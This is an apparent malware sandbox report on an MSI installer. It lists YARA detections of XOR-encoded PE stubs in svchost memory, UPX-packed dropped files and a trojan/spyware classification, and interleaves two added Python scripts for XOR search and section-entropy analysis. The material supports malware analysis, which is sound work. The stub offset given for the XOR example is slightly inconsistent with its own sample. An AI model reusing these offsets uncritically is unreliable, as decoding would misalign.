Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, type: MEMORY
Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, type: MEMORY
Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, type: MEMORY
Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, type: MEMORY
Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, type: MEMORY
Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, type: MEMORY
Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, type: MEMORY
Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
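The SUSP_XORed_MSDOS_Stub_Message and SUSP_XORed_Mozilla hits above come from YARA's `xor` string modifier: the rule is satisfied when a known plaintext occurs in memory under some single-byte XOR key. A normal PE carries the DOS stub text "This program cannot be run in DOS mode" in the clear, so a second, XOR-encoded copy in an svchost.exe memory region means an encoded payload PE (the stager's second stage) rather than the host binary's own stub. The script below is an added example, not part of the report or of the Florian Roth rules; it re-implements the mechanism, not the rules' exact strings, false-positive exclusions or key ranges, which are assumptions here. The sample buffer is constructed in code and is not data from the analysed sample.

```python
"""
Single-byte XOR plaintext search, the check behind YARA's `xor` modifier.
Added example; the rule strings and the key range 0x01..0xFF are assumptions,
and the sample blob is constructed, not taken from the analysed sample.
"""
from typing import List, Tuple

# Plaintexts worth hunting for (assumed to be what the two rules look for).
DOS_STUB = b"This program cannot be run in DOS mode"   # MS linker stub text
UA_PREFIX = b"Mozilla/5.0"                              # XORed user agent


def find_xored(buf: bytes, needle: bytes) -> List[Tuple[int, int]]:
    """Return (offset, key) for each place where `needle` appears XORed
    with one byte key in 0x01..0xFF. Key 0x00 is skipped on purpose:
    that is just the plaintext, which every legitimate PE contains.

    Instead of re-scanning the buffer 255 times, derive the only key that
    could work at each offset from the first byte and verify the rest once.
    """
    hits: List[Tuple[int, int]] = []
    first, n = needle[0], len(needle)
    for off in range(len(buf) - n + 1):
        key = buf[off] ^ first
        if key == 0:
            continue
        if bytes(b ^ key for b in needle) == buf[off:off + n]:
            hits.append((off, key))
    return hits


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_sample(key: int = 0x5A) -> bytes:
    """Constructed input: a blob with an XOR-encoded mini PE header
    (DOS header, stub code, stub text, 'PE\\0\\0') and a user agent inside,
    surrounded by unencoded padding. Not real malware data."""
    inner = (b"MZ" + b"\x90" * 62                                     # DOS header
             + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"  # stub code
             + b"!" + DOS_STUB + b".\r\r\n$" + b"\x00" * 7
             + b"PE\x00\x00"
             + b"\x00" * 32 + UA_PREFIX + b" (Windows NT 10.0; Win64; x64)\x00")
    return b"\x00" * 128 + b"hello" + xor_bytes(inner, key) + b"\x00" * 64


def scan(buf: bytes) -> dict:
    """Run both plaintext searches, mirroring the two rule hits above."""
    return {"dos_stub": find_xored(buf, DOS_STUB),
            "mozilla": find_xored(buf, UA_PREFIX)}


if __name__ == "__main__":
    for name, hits in scan(build_sample()).items():
        for off, key in hits:
            print(f"{name}: offset 0x{off:x}, key 0x{key:02x}")
```

Once the key is known, `xor_bytes(buf[off - 0x4E:], key)` hands the decoded region to a PE parser; the offset of the stub text minus the distance to the `MZ` header recovers the start of the embedded image. Multi-byte keys and per-position keys (RC4, rolling XOR) are outside what this check and YARA's `xor` modifier see.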
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,10_2_004AF110
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\3cf0a5.msi
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB6A8 appears 40 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E198530B0 appears 33 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B6A8 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB848 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19856620 appears 53 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19833D40 appears 38 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000024B7D11B848 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19834D50 appears 129 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB6A8 appears 39 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00000204F33CB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E19834000 appears 149 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000012E178BB848 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 0060C688 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 00615D14 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005DD7A8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005F4B90 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 005F4E74 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: String function: 00615A90 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC6740: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,13_2_04EC6740
Source: MSIFBC3.tmp.10.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JDQA9.tmp.11.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6rfyiAq0nM.msi | Binary or memory string: OriginalFileName vs 6rfyiAq0nM.msi
Source: is-93C0J.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.990987760073
Source: is-30MA7.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.990885780988
Source: is-8KFAQ.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.991049810131
Source: is-UKPSI.tmp.11.dr | Static PE information: Section: UPX1 ZLIB complexity 0.991049810131
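The four "UPX1 ZLIB complexity 0.99" entries are a packing indicator: a section whose bytes barely compress further is already compressed or encrypted, which for a UPX1 section means the real image is only available after unpacking (the UPX0 section that receives it normally has no raw bytes at all). The script below is an added example, not Joe Sandbox's code; it parses the section table of a PE by hand, computes the zlib ratio (compressed size over raw size, assumed here to be the sandbox's formula) and Shannon entropy per section, and runs on a minimal PE64 skeleton constructed in code rather than on the dropped files.

```python
"""
Per-section packing indicators (zlib ratio, Shannon entropy) for a PE.
Added example with a hand-written section-table parser so it needs no
third-party module; the sample PE64 is constructed below and is not one of
the dropped files. The zlib ratio formula is an assumption about the
sandbox's "ZLIB complexity" metric.
"""
import hashlib
import math
import struct
import zlib
from typing import Dict, Optional

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum for uniformly random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> Optional[float]:
    """len(zlib(data)) / len(data). Near or above 1.0 means incompressible
    (packed or encrypted). None for sections with no raw bytes, which is
    the usual state of UPX0 and must not be reported as 'fully packed'."""
    if not data:
        return None
    return len(zlib.compress(data, 9)) / len(data)


def sections(pe: bytes) -> Dict[str, bytes]:
    """Map section name -> raw bytes, following e_lfanew to the COFF header
    and skipping the optional header by its declared size."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out: Dict[str, bytes] = {}
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr, *_ = SECTION_HDR.unpack_from(
            pe, table + i * SECTION_HDR.size)
        out[name.rstrip(b"\0").decode("ascii", "replace")] = pe[raw_ptr:raw_ptr + raw_size]
    return out


def analyse(pe: bytes) -> Dict[str, dict]:
    return {name: {"size": len(d),
                   "entropy": round(shannon_entropy(d), 3),
                   "zlib_complexity": zlib_complexity(d)}
            for name, d in sections(pe).items()}


def _pseudo_random(n: int, seed: bytes = b"upx1") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a
    compressed UPX1 payload."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed, non-executable PE64 skeleton with a UPX-style layout:
    UPX0 (no raw data), UPX1 (incompressible), .rsrc (mostly zeros)."""
    upx1 = _pseudo_random(4096)
    rsrc = b"\0" * 500 + b"RSRC" + b"\0" * 8
    opt = struct.pack("<H", 0x20B) + b"\0" * 238          # PE32+ magic, 240 bytes
    hdr_len = 0x40 + 4 + 20 + len(opt) + 3 * SECTION_HDR.size
    hdr_len = (hdr_len + 511) // 512 * 512                # file alignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, len(opt), 0x22)
    secs = SECTION_HDR.pack(b"UPX0", 0x10000, 0x1000, 0, hdr_len, 0, 0, 0, 0, 0xE0000080)
    secs += SECTION_HDR.pack(b"UPX1", len(upx1), 0x11000, len(upx1), hdr_len,
                             0, 0, 0, 0, 0xE0000040)
    secs += SECTION_HDR.pack(b".rsrc", len(rsrc), 0x12000, len(rsrc), hdr_len + len(upx1),
                             0, 0, 0, 0, 0xC0000040)
    headers = dos + b"PE\0\0" + coff + opt + secs
    return headers.ljust(hdr_len, b"\0") + upx1 + rsrc


if __name__ == "__main__":
    for name, stats in analyse(build_sample_pe()).items():
        print(f"{name:8s} {stats}")
```

Pointing `analyse()` at the bytes of a real dropped file is a one-line change; treat a ratio above roughly 0.95 together with entropy above 7 as "packed or encrypted, unpack before static analysis", and ignore sections with no raw data rather than scoring them.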
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Users\user\AppData\Local\Programs
Source: classification engine | Classification label: mal74.troj.spyw.evad.winMSI@10/39@2/5
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
